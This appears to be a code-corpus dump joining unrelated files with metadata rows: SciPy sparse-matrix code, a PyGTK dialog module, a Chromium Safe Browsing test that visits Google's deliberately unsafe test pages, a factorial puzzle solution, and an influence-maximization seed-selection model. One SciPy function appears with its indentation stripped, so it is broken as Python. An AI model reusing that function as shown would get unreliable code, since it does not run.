            self.data = self.data[:new_M]
        elif new_M > M:
            # Growing: append fresh empty rows.
            self.rows = np.resize(self.rows, new_M)
            self.data = np.resize(self.data, new_M)
            for i in range(M, new_M):
                self.rows[i] = []
                self.data[i] = []

        if new_N < N:
            # Column indices are kept sorted per row, so a bisect finds
            # the first index that falls outside the new column count.
            for row, data in zip(self.rows, self.data):
                trunc = bisect_left(row, new_N)
                del row[trunc:]
                del data[trunc:]

        self._shape = shape

    resize.__doc__ = spmatrix.resize.__doc__

    def toarray(self, order=None, out=None):
        d = self._process_toarray_args(order, out)
        for i, row in enumerate(self.rows):
            for pos, j in enumerate(row):
                d[i, j] = self.data[i][pos]
        return d

    toarray.__doc__ = spmatrix.toarray.__doc__

    def transpose(self, axes=None, copy=False):
        # LIL has no native transpose; round-trip through CSR.
        return self.tocsr(copy=copy).transpose(axes=axes, copy=False).tolil(copy=False)

    transpose.__doc__ = spmatrix.transpose.__doc__

    def tolil(self, copy=False):
        if copy:
            return self.copy()
        else:
            return self

    tolil.__doc__ = spmatrix.tolil.__doc__

    def tocsr(self, copy=False):
        # Row lengths give the CSR indptr; flattening the per-row lists
        # gives indices and data.
        lst = [len(x) for x in self.rows]
        idx_dtype = get_index_dtype(maxval=max(self.shape[1], sum(lst)))
        indptr = np.cumsum([0] + lst, dtype=idx_dtype)
        indices = np.array([x for y in self.rows for x in y], dtype=idx_dtype)
        data = np.array([x for y in self.data for x in y], dtype=self.dtype)

        from .csr import csr_matrix
        return csr_matrix((data, indices, indptr), shape=self.shape)

    tocsr.__doc__ = spmatrix.tocsr.__doc__
def _prepare_index_for_memoryview(i, j, x=None):
"""
Convert index and data arrays to form suitable for passing to the
Cython fancy getset routines.
The conversions are necessary since to (i) ensure the integer
index arrays are in one of the accepted types, and (ii) to ensure
the arrays are writable so that Cython memoryview support doesn't
choke on them.
Parameters
----------
i, j
Index arrays
x : optional
Data arrays
Returns
-------
i, j, x
Re-formatted arrays (x is omitted, if input was None)
"""
if i.dtype > j.dtype:
j = j.astype(i.dtype)
elif i.dtype < j.dtype:
i = i.astype(j.dtype)
if not i.flags.writeable or i.dtype not in (np.int32, np.int64):
i = i.astype(np.intp)
if not j.flags.writeable or j.dtype not in (np.int32, np.int64):
j = j.astype(np.intp)
if x is not None:
if not x.flags.writeable:
x = x.copy()
return i, j, x
else:
return i, j
def isspmatrix_lil(x):
    """Check whether *x* is of lil_matrix type.

    Parameters
    ----------
    x
        object to check for being a lil matrix

    Returns
    -------
    bool
        True if x is a lil matrix, False otherwise

    Examples
    --------
    >>> from scipy.sparse import lil_matrix, isspmatrix_lil
    >>> isspmatrix_lil(lil_matrix([[5]]))
    True

    >>> from scipy.sparse import lil_matrix, csr_matrix, isspmatrix_lil
    >>> isspmatrix_lil(csr_matrix([[5]]))
    False
    """
    # isinstance covers subclasses as well, matching the other
    # isspmatrix_* predicates.
    return isinstance(x, lil_matrix)
| [
"[email protected]"
] | |
9e8d55b19f819bc5d3bd1235d4e62225b2271730 | b7b2f80ab5e1ee0ea028576e3014b62b8d3a8d7e | /pyedit/pyedit-032/pyedlib/pedync.py | 0ba8b937ecb2f51e498cc3516a5f9b0a422ebcc7 | [] | no_license | pglen/pgpygtk | 4d1405478a714f003984cf3e3db04ff1f767470b | 33f58010e304f1a312f2356de453ecedb7aa21ef | refs/heads/master | 2021-01-22T01:18:52.238415 | 2019-01-01T01:37:24 | 2019-01-01T01:37:24 | 102,215,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,693 | py | #!/usr/bin/env python
# Prompt Handler for pyedit
import os, string, gtk, gobject
import pyedlib.pedconfig
# ------------------------------------------------------------------------
def yes_no_cancel(title, message, cancel = True):
    """Show a modal Yes/No(/Cancel) dialog and return the gtk response.

    Close / reject / delete responses are all normalised to
    gtk.RESPONSE_CANCEL. The Cancel button is only added when *cancel*
    is true.
    """
    dialog = gtk.Dialog(title,
                   None,
                   gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT)
    dialog.set_default_response(gtk.RESPONSE_YES)
    dialog.set_position(gtk.WIN_POS_CENTER)
    # Spacer labels pad the message on both sides.
    sp = "        "
    label = gtk.Label(message);
    label2 = gtk.Label(sp); label3 = gtk.Label(sp)
    hbox = gtk.HBox() ; hbox.pack_start(label2);
    hbox.pack_start(label); hbox.pack_start(label3)
    dialog.vbox.pack_start(hbox)
    dialog.add_button("_Yes", gtk.RESPONSE_YES)
    dialog.add_button("_No", gtk.RESPONSE_NO)
    if cancel:
        dialog.add_button("_Cancel", gtk.RESPONSE_CANCEL)
    # y/n/c keyboard shortcuts are handled by area_key.
    dialog.connect("key-press-event", area_key, cancel)
    #dialog.connect("key-release-event", area_key, cancel)
    dialog.show_all()
    response = dialog.run()
    # Convert all responses to cancel
    if response == gtk.RESPONSE_CANCEL or \
       response == gtk.RESPONSE_REJECT or \
       response == gtk.RESPONSE_CLOSE or \
       response == gtk.RESPONSE_DELETE_EVENT:
        response = gtk.RESPONSE_CANCEL

    dialog.destroy()
    return response
def area_key(win, event, cancel):
    """Key handler for yes_no_cancel: map y/n (and c when *cancel* is
    true) key presses to the matching dialog responses."""
    #print event
    if event.keyval == gtk.keysyms.y or \
       event.keyval == gtk.keysyms.Y:
        win.response(gtk.RESPONSE_YES)
    if event.keyval == gtk.keysyms.n or \
       event.keyval == gtk.keysyms.N:
        win.response(gtk.RESPONSE_NO)
    if cancel:
        if event.keyval == gtk.keysyms.c or \
           event.keyval == gtk.keysyms.C:
            win.response(gtk.RESPONSE_CANCEL)
# ------------------------------------------------------------------------
# Show About dialog:
import platform

def about():
    """Show the PyEdit About dialog (name, version, toolkit / Python
    versions, copyright and logo)."""
    dialog = gtk.AboutDialog()
    dialog.set_name(" PyEdit - Python Editor ")
    dialog.set_version(str(pyedlib.pedconfig.conf.version));
    comm = "\nPython based easily configurable editor.\n"\
            "\nRunning PyGtk %d.%d.%d" % gtk.pygtk_version +\
            "\nRunning GTK %d.%d.%d\n" % gtk.gtk_version +\
            "\nRunning Python %s\n" % platform.python_version()
    dialog.set_comments(comm);
    dialog.set_copyright("Portions \302\251 Copyright Peter Glen\n"
                         "Project placed in the Public Domain.")
    img_dir = os.path.join(os.path.dirname(__file__), 'images')
    img_path = os.path.join(img_dir, 'gtk-logo-rgb.gif')
    try:
        pixbuf = gtk.gdk.pixbuf_new_from_file(img_path)
        #print "loaded pixbuf"
        dialog.set_logo(pixbuf)
    except gobject.GError, error:
        # A missing logo is not fatal; just report it.
        print "Cannot load logo for about dialog";
    #dialog.set_website("")
    ## Close dialog on user response
    dialog.connect ("response", lambda d, r: d.destroy())
    dialog.connect("key-press-event", about_key)
    dialog.show()
def about_key(win, event):
    """Close the about dialog when Alt-X is pressed."""
    #print "about_key", event
    if event.type != gtk.gdk.KEY_PRESS:
        return
    if event.keyval in (gtk.keysyms.x, gtk.keysyms.X) and \
       (event.state & gtk.gdk.MOD1_MASK):
        win.destroy()
# Show a regular message:
def message(strx, title = None, icon = gtk.MESSAGE_INFO):
    """Show a non-blocking message dialog.

    *title* defaults to "pyedit"; *icon* selects the gtk stock icon.
    """
    dialog = gtk.MessageDialog(None, gtk.DIALOG_DESTROY_WITH_PARENT,
                               icon, gtk.BUTTONS_CLOSE, strx)
    if title:
        dialog.set_title(title)
    else:
        dialog.set_title("pyedit")

    # Close dialog on user response
    dialog.connect("response", lambda d, r: d.destroy())
    dialog.show()
| [
"[email protected]"
] | |
a58a9d7303bef7ea14954d5a6376cf8f18b14d02 | fe91ffa11707887e4cdddde8f386a8c8e724aa58 | /chrome/test/enterprise/e2e/policy/safe_browsing/safe_browsing_ui_test.py | 296faf0623b41a371544722ac0962d719d89d5de | [
"BSD-3-Clause"
] | permissive | akshaymarch7/chromium | 78baac2b45526031846ccbaeca96c639d1d60ace | d273c844a313b1e527dec0d59ce70c95fd2bd458 | refs/heads/master | 2023-02-26T23:48:03.686055 | 2020-04-15T01:20:07 | 2020-04-15T01:20:07 | 255,778,651 | 2 | 1 | BSD-3-Clause | 2020-04-15T02:04:56 | 2020-04-15T02:04:55 | null | UTF-8 | Python | false | false | 2,371 | py | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import test_util
import time
from absl import app
from selenium import webdriver
from pywinauto.application import Application
UnsafePageLink = "http://testsafebrowsing.appspot.com/s/malware.html"
UnsafePageLinkTabText = "Security error"
UnsafeDownloadLink = "http://testsafebrowsing.appspot.com/s/badrep.exe"
UnsafeDownloadTextRe = ".* is dangerous,\s*so\s*Chrom.* has blocked it"
def visit(window, url):
    """Visit a specific URL through pywinauto.Application.

    SafeBrowsing intercepts HTTP requests & hangs WebDriver.get(), which prevents
    us from getting the page source. Using pywinauto to visit the pages instead.
    """
    window.Edit.set_edit_text(url).type_keys("%{ENTER}")
    # Give the page (and any SafeBrowsing interstitial) time to render.
    time.sleep(10)
def main(argv):
    """Drive Chrome at known-unsafe URLs and report whether SafeBrowsing
    blocked the page and the download (printed as RESULTS.* lines that
    the enterprise test harness parses)."""
    # Keep background networking enabled so SafeBrowsing lists download.
    exclude_switches = ["disable-background-networking"]
    chrome_options = webdriver.ChromeOptions()
    chrome_options.add_experimental_option("excludeSwitches", exclude_switches)
    driver = test_util.create_chrome_webdriver(chrome_options=chrome_options)

    app = Application(backend="uia")
    app.connect(title_re='.*Chrome|.*Chromium')
    window = app.top_window()

    # Wait for Chrome to download SafeBrowsing lists in the background.
    # There's no trigger to force this operation or synchronize on it, but quick
    # experiments have shown 3-4 minutes in most cases, so 5 should be plenty.
    time.sleep(60 * 5)

    print "Visiting unsafe page: %s" % UnsafePageLink
    visit(window, UnsafePageLink)

    # Scan the UI tree for the "Security error" interstitial tab text.
    unsafe_page = False
    for desc in app.top_window().descendants():
        if desc.window_text():
            print "unsafe_page.item: %s" % desc.window_text()
            if UnsafePageLinkTabText in desc.window_text():
                unsafe_page = True
                break

    print "Downloading unsafe file: %s" % UnsafeDownloadLink
    visit(window, UnsafeDownloadLink)

    # Scan the UI tree for the blocked-download warning text.
    unsafe_download = False
    for desc in app.top_window().descendants():
        if desc.window_text():
            print "unsafe_download.item: %s" % desc.window_text()
            if re.search(UnsafeDownloadTextRe, desc.window_text()):
                unsafe_download = True
                break

    print "RESULTS.unsafe_page: %s" % unsafe_page
    print "RESULTS.unsafe_download: %s" % unsafe_download

    driver.quit()


if __name__ == '__main__':
    app.run(main)
| [
"[email protected]"
] | |
61a13c91993c787854fd3d4282aba7d225cc06e8 | 4b32cbc767e8cc0d61e7771b8a6d5c7c9b324a97 | /Python/1676 (팩토리얼 0의 개수,수학).py | 1f1b2191894cf9d0e4754ced7350cb220d5c75dc | [] | no_license | Jongminfire/Baekjoon | 45e554c983fa583ca7a1709e1ac435e1a38e075b | 8dc0ec58ddc43de2dd44b3b1af9346f708c1208e | refs/heads/master | 2023-07-29T10:35:52.648825 | 2021-09-14T15:12:22 | 2021-09-14T15:12:22 | 247,514,920 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | n = int(input())
print(n//5+n//25+n//125)
# 팩토리얼 0의 개수는 5의 x제곱일 때 x만큼 늘어난다
| [
"[email protected]"
] | |
a8b6f5e111d6183e5069a6819cb3177032881f29 | 672c454454cc62a49d0caf74558c265c7db4228f | /Model.py | 428fe5396ea2642e37d6dd7c1f008ff649c0a003 | [] | no_license | nmaypeter/project_nw_200505 | cd0ce01ce07c41683ca96b0dac3960bfac6b8ffd | f0871506f8ed4dbdd8e1b1a0dcbfa20196a652b7 | refs/heads/master | 2022-07-29T23:16:10.271862 | 2020-05-17T16:37:07 | 2020-05-17T16:37:07 | 261,580,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42,600 | py | from SeedSelection import *
from Evaluation import *
import time
import copy
import math
class Model:
def __init__(self, mn_list, data_key, prod_key, cas_key, wallet_key=0):
    """Bind one model / dataset / product / cascade configuration.

    mn_list : model-name option list; mn_list[1] is stored as r_flag
        (presumably a revenue/ratio flag -- confirm against get_model_name).
    wallet_key=0 selects the "unspecified wallet distribution" default.
    """
    self.model_name = get_model_name(mn_list)
    self.r_flag = mn_list[1]
    self.mn_list = mn_list
    # Human-readable names resolved from the module-level lookup dicts.
    self.data_name = dataset_name_dict[data_key]
    self.prod_name = product_name_dict[prod_key]
    self.cas_name = cascade_model_dict[cas_key]
    self.data_key = data_key
    self.prod_key = prod_key
    self.cas_key = cas_key
    self.wallet_type = wallet_distribution_type_dict[wallet_key]
    self.wallet_key = wallet_key
    # Every wallet distribution except the 0 ("unspecified") entry.
    self.wd_seq = [wd for wd in wallet_distribution_type_dict.keys() if wd != 0]
    # Iterations 10..7; the total budget is total seed cost / 2**i.
    self.budget_iteration = [i for i in range(10, 6, -1)]
    self.monte_carlo = 100
    def model_dag(self):
        """
        DAG/MIOA seed selection with a CELF lazy-greedy loop over a max-heap.

        Runs once per budget level in self.budget_iteration; when a small
        budget is about to be exhausted, the current state is snapshotted so
        the next (larger) budget resumes from it instead of restarting.
        Writes a per-seed selection log per wallet distribution, then
        evaluates every budget level's seed set.
        """
        # Build the problem instance: node costs, diffusion graph, products.
        ini = Initialization(self.data_key, self.prod_key, self.cas_key, self.wallet_key)
        seed_cost_dict = ini.constructSeedCostDict()
        graph_dict = ini.constructGraphDict()
        product_list, epw_list = ini.constructProductList()
        num_product = len(product_list)
        total_cost = sum(seed_cost_dict[i] for i in seed_cost_dict)
        # One slot per budget level; -1 marks "no result recorded yet".
        seed_set_sequence = [-1 for _ in range(len(self.budget_iteration))]
        ss_time_sequence = [-1 for _ in range(len(self.budget_iteration))]
        seed_data_sequence = [-1 for _ in range(len(self.budget_iteration))]
        # The DAG variant (1 or 2) is encoded as the last character of the
        # method name looked up in model_dict.
        dag_class = int(list(model_dict['method'][self.mn_list[0]])[-1])
        ssmioa_model = SeedSelectionMIOA(graph_dict, seed_cost_dict, product_list, epw_list, dag_class, self.r_flag)
        ss_start_time = time.time()
        bud_iteration = self.budget_iteration.copy()
        now_b_iter = bud_iteration.pop(0)
        now_budget, now_profit = 0.0, 0.0
        seed_set = [set() for _ in range(num_product)]
        # Log only for the configured wallet distribution, or for all of
        # them when none is specified (key maps to a falsy value).
        wd_seq = [self.wallet_key] if wallet_distribution_type_dict[self.wallet_key] else self.wd_seq
        mioa_dict = ssmioa_model.generateMIOA()
        celf_heap = ssmioa_model.generateCelfHeap(mioa_dict)
        ss_acc_time = round(time.time() - ss_start_time, 4)
        # temp_sequence holds resumable snapshots of the greedy state.
        temp_sequence = [[ss_acc_time, now_budget, now_profit, seed_set, celf_heap]]
        temp_seed_data = [['time\tk_prod\ti_node\tnow_budget\tnow_profit\tseed_num\n']]
        while temp_sequence:
            ss_start_time = time.time()
            now_bi_index = self.budget_iteration.index(now_b_iter)
            # Budget halves for each extra budget-iteration step.
            total_budget = safe_div(total_cost, 2 ** now_b_iter)
            [ss_acc_time, now_budget, now_profit, seed_set, celf_heap] = temp_sequence.pop()
            seed_data = temp_seed_data.pop()
            print('@ selection\t' + self.model_name + ' @ ' + self.data_name + '_' + self.cas_name +
                  '\t' + self.wallet_type + '_' + self.prod_name + '_bi' + str(now_b_iter) + ', budget = ' + str(total_budget))
            celf_heap_c = []
            while now_budget < total_budget and celf_heap:
                mep_item = heap.heappop_max(celf_heap)
                mep_mg, mep_k_prod, mep_i_node, mep_flag = mep_item
                sc = seed_cost_dict[mep_i_node]
                # Snapshot condition is evaluated twice: first to copy the
                # heap (before this round can push back into it), then below
                # to record the resumable state for the next budget level.
                if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
                    celf_heap_c = copy.deepcopy(celf_heap)
                seed_set_length = sum(len(seed_set[k]) for k in range(num_product))
                if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
                    ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
                    now_b_iter = bud_iteration.pop(0)
                    temp_sequence.append([ss_time, now_budget, now_profit, copy.deepcopy(seed_set), celf_heap_c])
                    temp_seed_data.append(seed_data.copy())
                if round(now_budget + sc, 4) > total_budget:
                    continue
                # CELF: the cached gain is only valid if nothing was added
                # since it was computed (flag equals current seed count).
                if mep_flag == seed_set_length:
                    seed_set[mep_k_prod].add(mep_i_node)
                    now_budget = round(now_budget + sc, 4)
                    # With r_flag the heap stores gain-per-cost, so multiply
                    # the cost back in to accumulate absolute profit.
                    now_profit = round(now_profit + (mep_mg * (sc if self.r_flag else 1.0)), 4)
                    seed_data.append(str(round(time.time() - ss_start_time + ss_acc_time, 4)) + '\t' + str(mep_k_prod) + '\t' + str(mep_i_node) + '\t' +
                                     str(now_budget) + '\t' + str(now_profit) + '\t' + str([len(seed_set[k]) for k in range(num_product)]) + '\n')
                else:
                    # Stale entry: recompute the marginal gain and re-push.
                    seed_set_t = copy.deepcopy(seed_set)
                    seed_set_t[mep_k_prod].add(mep_i_node)
                    dag_dict = [{} for _ in range(num_product)]
                    if dag_class == 1:
                        dag_dict = ssmioa_model.generateDAG1(mioa_dict, seed_set_t)
                    elif dag_class == 2:
                        dag_dict = ssmioa_model.generateDAG2(mioa_dict, seed_set_t)
                    ep_t = ssmioa_model.calculateExpectedProfit(dag_dict, seed_set_t)
                    mg_t = safe_div(round(ep_t - now_profit, 4), sc if self.r_flag else 1.0)
                    flag_t = seed_set_length
                    if mg_t > 0:
                        celf_item_t = (mg_t, mep_k_prod, mep_i_node, flag_t)
                        heap.heappush_max(celf_heap, celf_item_t)
            ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
            print('ss_time = ' + str(ss_time) + 'sec, cost = ' + str(now_budget) + ', seed_set_length = ' + str([len(s_set_k) for s_set_k in seed_set]))
            seed_set_sequence[now_bi_index] = seed_set
            ss_time_sequence[now_bi_index] = ss_time
            seed_data_sequence[now_bi_index] = seed_data
            # Persist the per-seed log under seed_data/<dataset>_<cascade>/....
            for wd in wd_seq:
                seed_data_path = 'seed_data/' + self.data_name + '_' + self.cas_name
                if not os.path.isdir(seed_data_path):
                    os.mkdir(seed_data_path)
                seed_data_path0 = seed_data_path + '/' + wallet_distribution_type_dict[wd] + '_' + self.prod_name + '_bi' + str(self.budget_iteration[now_bi_index])
                if not os.path.isdir(seed_data_path0):
                    os.mkdir(seed_data_path0)
                seed_data_file = open(seed_data_path0 + '/' + self.model_name + '.txt', 'w')
                for sd in seed_data:
                    seed_data_file.write(sd)
                seed_data_file.close()
        # Backfill budget levels that never got a snapshot with the result
        # of the previous (smaller) budget level.
        while -1 in seed_data_sequence:
            no_data_index = seed_data_sequence.index(-1)
            seed_set_sequence[no_data_index] = seed_set_sequence[no_data_index - 1]
            ss_time_sequence[no_data_index] = ss_time_sequence[no_data_index - 1]
            seed_data_sequence[no_data_index] = seed_data_sequence[no_data_index - 1]
        eva_model = EvaluationM(self.mn_list, self.data_key, self.prod_key, self.cas_key)
        for bi in self.budget_iteration:
            now_bi_index = self.budget_iteration.index(bi)
            if wallet_distribution_type_dict[self.wallet_key]:
                eva_model.evaluate(bi, self.wallet_key, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
            else:
                for wd in self.wd_seq:
                    eva_model.evaluate(bi, wd, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
    def model_spbp(self):
        """
        SPBP seed selection: a dict-based greedy that, after accepting a
        seed, lazily refreshes the cached gains of that seed's neighbors
        (via ps_dict) instead of maintaining a heap.  Unlike model_dag,
        each budget level is solved from scratch.
        """
        ini = Initialization(self.data_key, self.prod_key, self.cas_key, self.wallet_key)
        seed_cost_dict = ini.constructSeedCostDict()
        graph_dict = ini.constructGraphDict()
        product_list, epw_list = ini.constructProductList()
        num_product = len(product_list)
        total_cost = sum(seed_cost_dict[i] for i in seed_cost_dict)
        # One slot per budget level; -1 marks "no result recorded yet".
        seed_set_sequence = [-1 for _ in range(len(self.budget_iteration))]
        ss_time_sequence = [-1 for _ in range(len(self.budget_iteration))]
        seed_data_sequence = [-1 for _ in range(len(self.budget_iteration))]
        # DAG variant (1 or 2), encoded in the method name from model_dict.
        dag_class = int(list(model_dict['method'][self.mn_list[0]])[-1])
        ssmioa_model = SeedSelectionMIOA(graph_dict, seed_cost_dict, product_list, epw_list, dag_class, self.r_flag)
        ssspbp_model = SeedSelectionSPBP(graph_dict, seed_cost_dict, product_list, epw_list, dag_class, self.r_flag)
        for now_b_iter in self.budget_iteration:
            ss_start_time = time.time()
            now_budget, now_profit = 0.0, 0.0
            now_bi_index = self.budget_iteration.index(now_b_iter)
            total_budget = safe_div(total_cost, 2 ** now_b_iter)
            seed_set = [set() for _ in range(num_product)]
            wd_seq = [self.wallet_key] if wallet_distribution_type_dict[self.wallet_key] else self.wd_seq
            mioa_dict, ps_dict = ssspbp_model.generateMIOA()
            # max_s appears to hold the best single-seed fallback for this
            # budget (profit, k_prod, i_node, ...) — confirm in generateCelfDict.
            celf_dict, max_s = ssspbp_model.generateCelfDict(mioa_dict, total_budget)
            seed_data = ['time\tk_prod\ti_node\tnow_budget\tnow_profit\tseed_num\n']
            print('@ selection\t' + get_model_name(self.mn_list) + ' @ ' + dataset_name_dict[self.data_key] + '_' + cascade_model_dict[self.cas_key] +
                  '\t' + wallet_distribution_type_dict[self.wallet_key] + '_' + product_name_dict[self.prod_key] + '_bi' + str(now_b_iter) + ', budget = ' + str(total_budget))
            while now_budget < total_budget and celf_dict:
                # Pop the (product, node) pair with the largest cached gain.
                mep_k_prod, mep_i_node = max(celf_dict, key=celf_dict.get)
                mep_mg = max(celf_dict.values())
                del celf_dict[(mep_k_prod, mep_i_node)]
                sc = seed_cost_dict[mep_i_node]
                if round(now_budget + sc, 4) > total_budget:
                    continue
                seed_set[mep_k_prod].add(mep_i_node)
                now_budget = round(now_budget + sc, 4)
                # With r_flag the cached gain is per-cost; scale back by sc.
                now_profit = round(now_profit + (mep_mg * (sc if self.r_flag else 1.0)), 4)
                seed_data.append(str(round(time.time() - ss_start_time, 4)) + '\t' + str(mep_k_prod) + '\t' + str(mep_i_node) + '\t' +
                                 str(now_budget) + '\t' + str(now_profit) + '\t' + str([len(seed_set[k]) for k in range(num_product)]) + '\n')
                delta_max = 0.0
                # Refresh stale gains of the accepted seed's neighbors whose
                # cached value still exceeds the best refreshed value so far.
                for (k, i) in ps_dict[mep_k_prod][mep_i_node]:
                    if i in seed_set[k]:
                        continue
                    if (k, i) not in celf_dict:
                        continue
                    if celf_dict[(k, i)] > delta_max:
                        seed_set_t = copy.deepcopy(seed_set)
                        # NOTE(review): this adds mep_i_node (already a seed)
                        # rather than the candidate (k, i), and divides by
                        # mep_i_node's cost `sc` below, yet stores the result
                        # as (k, i)'s gain — looks like it should evaluate
                        # (k, i) itself; confirm against the SPBP paper/impl.
                        seed_set_t[mep_k_prod].add(mep_i_node)
                        dag_dict = [{} for _ in range(num_product)]
                        if dag_class == 1:
                            dag_dict = ssmioa_model.generateDAG1(mioa_dict, seed_set_t)
                        elif dag_class == 2:
                            dag_dict = ssmioa_model.generateDAG2(mioa_dict, seed_set_t)
                        ep_t = ssmioa_model.calculateExpectedProfit(dag_dict, seed_set_t)
                        mg_t = round(ep_t - now_profit, 4)
                        mg_t = safe_div(mg_t, sc) if self.r_flag else mg_t
                        celf_dict[(k, i)] = mg_t
                        delta_max = mg_t if mg_t > delta_max else delta_max
            # Fall back to the best single seed when it beats the greedy set.
            if max_s[0] > now_profit and max_s[-1] != '-1':
                seed_set = [set() for _ in range(num_product)]
                seed_set[max_s[1]].add(max_s[2])
            ss_time = round(time.time() - ss_start_time, 4)
            print('ss_time = ' + str(ss_time) + 'sec, cost = ' + str(now_budget) + ', seed_set_length = ' + str([len(s_set_k) for s_set_k in seed_set]))
            seed_set_sequence[now_bi_index] = seed_set
            ss_time_sequence[now_bi_index] = ss_time
            seed_data_sequence[now_bi_index] = seed_data
            # Persist the per-seed log for each relevant wallet distribution.
            for wd in wd_seq:
                seed_data_path = 'seed_data/' + self.data_name + '_' + self.cas_name
                if not os.path.isdir(seed_data_path):
                    os.mkdir(seed_data_path)
                seed_data_path0 = seed_data_path + '/' + wallet_distribution_type_dict[wd] + '_' + self.prod_name + '_bi' + str(self.budget_iteration[now_bi_index])
                if not os.path.isdir(seed_data_path0):
                    os.mkdir(seed_data_path0)
                seed_data_file = open(seed_data_path0 + '/' + self.model_name + '.txt', 'w')
                for sd in seed_data:
                    seed_data_file.write(sd)
                seed_data_file.close()
        # Backfill any budget level without a result from the previous one.
        while -1 in seed_data_sequence:
            no_data_index = seed_data_sequence.index(-1)
            seed_set_sequence[no_data_index] = seed_set_sequence[no_data_index - 1]
            ss_time_sequence[no_data_index] = ss_time_sequence[no_data_index - 1]
            seed_data_sequence[no_data_index] = seed_data_sequence[no_data_index - 1]
        eva_model = EvaluationM(self.mn_list, self.data_key, self.prod_key, self.cas_key)
        for bi in self.budget_iteration:
            now_bi_index = self.budget_iteration.index(bi)
            if wallet_distribution_type_dict[self.wallet_key]:
                eva_model.evaluate(bi, self.wallet_key, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
            else:
                for wd in self.wd_seq:
                    eva_model.evaluate(bi, wd, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
    def model_ng(self):
        """
        Naive-greedy (NG) seed selection with a CELF max-heap; the profit of
        a candidate set is obtained from SeedSelectionNG.getSeedSetProfit
        (no DAG approximation).  Uses the same budget-snapshot resumption
        scheme as model_dag.
        """
        ini = Initialization(self.data_key, self.prod_key, self.cas_key, self.wallet_key)
        seed_cost_dict = ini.constructSeedCostDict()
        graph_dict = ini.constructGraphDict()
        product_list, epw_list = ini.constructProductList()
        num_product = len(product_list)
        total_cost = sum(seed_cost_dict[i] for i in seed_cost_dict)
        # One slot per budget level; -1 marks "no result recorded yet".
        seed_set_sequence = [-1 for _ in range(len(self.budget_iteration))]
        ss_time_sequence = [-1 for _ in range(len(self.budget_iteration))]
        seed_data_sequence = [-1 for _ in range(len(self.budget_iteration))]
        ssng_model = SeedSelectionNG(graph_dict, seed_cost_dict, product_list, epw_list, self.r_flag)
        ss_start_time = time.time()
        bud_iteration = self.budget_iteration.copy()
        now_b_iter = bud_iteration.pop(0)
        now_budget, now_profit = 0.0, 0.0
        seed_set = [set() for _ in range(num_product)]
        wd_seq = [self.wallet_key] if wallet_distribution_type_dict[self.wallet_key] else self.wd_seq
        celf_heap = ssng_model.generateCelfHeap()
        ss_acc_time = round(time.time() - ss_start_time, 4)
        # Resumable snapshots: the state is saved just before a budget is
        # exhausted so the next (larger) budget continues from it.
        temp_sequence = [[ss_acc_time, now_budget, now_profit, seed_set, celf_heap]]
        temp_seed_data = [['time\tk_prod\ti_node\tnow_budget\tnow_profit\tseed_num\n']]
        while temp_sequence:
            ss_start_time = time.time()
            now_bi_index = self.budget_iteration.index(now_b_iter)
            total_budget = safe_div(total_cost, 2 ** now_b_iter)
            [ss_acc_time, now_budget, now_profit, seed_set, celf_heap] = temp_sequence.pop()
            seed_data = temp_seed_data.pop()
            print('@ selection\t' + get_model_name(self.mn_list) + ' @ ' + dataset_name_dict[self.data_key] + '_' + cascade_model_dict[self.cas_key] +
                  '\t' + wallet_distribution_type_dict[self.wallet_key] + '_' + product_name_dict[self.prod_key] + '_bi' + str(now_b_iter) + ', budget = ' + str(total_budget))
            celf_heap_c = []
            while now_budget < total_budget and celf_heap:
                mep_item = heap.heappop_max(celf_heap)
                mep_mg, mep_k_prod, mep_i_node, mep_flag = mep_item
                sc = seed_cost_dict[mep_i_node]
                # Same snapshot condition twice: copy the heap first (before
                # anything can be pushed back), then record the state.
                if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
                    celf_heap_c = copy.deepcopy(celf_heap)
                seed_set_length = sum(len(seed_set[k]) for k in range(num_product))
                if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
                    ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
                    now_b_iter = bud_iteration.pop(0)
                    temp_sequence.append([ss_time, now_budget, now_profit, copy.deepcopy(seed_set), celf_heap_c])
                    temp_seed_data.append(seed_data.copy())
                if round(now_budget + sc, 4) > total_budget:
                    continue
                # CELF lazy evaluation: cached gain is valid only when the
                # flag matches the current number of chosen seeds.
                if mep_flag == seed_set_length:
                    seed_set[mep_k_prod].add(mep_i_node)
                    now_budget = round(now_budget + sc, 4)
                    # Profit is recomputed from scratch on acceptance.
                    now_profit = ssng_model.getSeedSetProfit(seed_set)
                    seed_data.append(str(round(time.time() - ss_start_time + ss_acc_time, 4)) + '\t' + str(mep_k_prod) + '\t' + str(mep_i_node) + '\t' +
                                     str(now_budget) + '\t' + str(now_profit) + '\t' + str([len(seed_set[k]) for k in range(num_product)]) + '\n')
                else:
                    # Stale: recompute the marginal gain and re-push.
                    seed_set_t = copy.deepcopy(seed_set)
                    seed_set_t[mep_k_prod].add(mep_i_node)
                    ep_t = ssng_model.getSeedSetProfit(seed_set_t)
                    mg_t = round(ep_t - now_profit, 4)
                    if self.r_flag:
                        mg_t = safe_div(mg_t, sc)
                    flag_t = seed_set_length
                    if mg_t > 0:
                        celf_item_t = (mg_t, mep_k_prod, mep_i_node, flag_t)
                        heap.heappush_max(celf_heap, celf_item_t)
            ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
            print('ss_time = ' + str(ss_time) + 'sec, cost = ' + str(now_budget) + ', seed_set_length = ' + str([len(s_set_k) for s_set_k in seed_set]))
            seed_set_sequence[now_bi_index] = seed_set
            ss_time_sequence[now_bi_index] = ss_time
            seed_data_sequence[now_bi_index] = seed_data
            # Persist the per-seed log for each relevant wallet distribution.
            for wd in wd_seq:
                seed_data_path = 'seed_data/' + self.data_name + '_' + self.cas_name
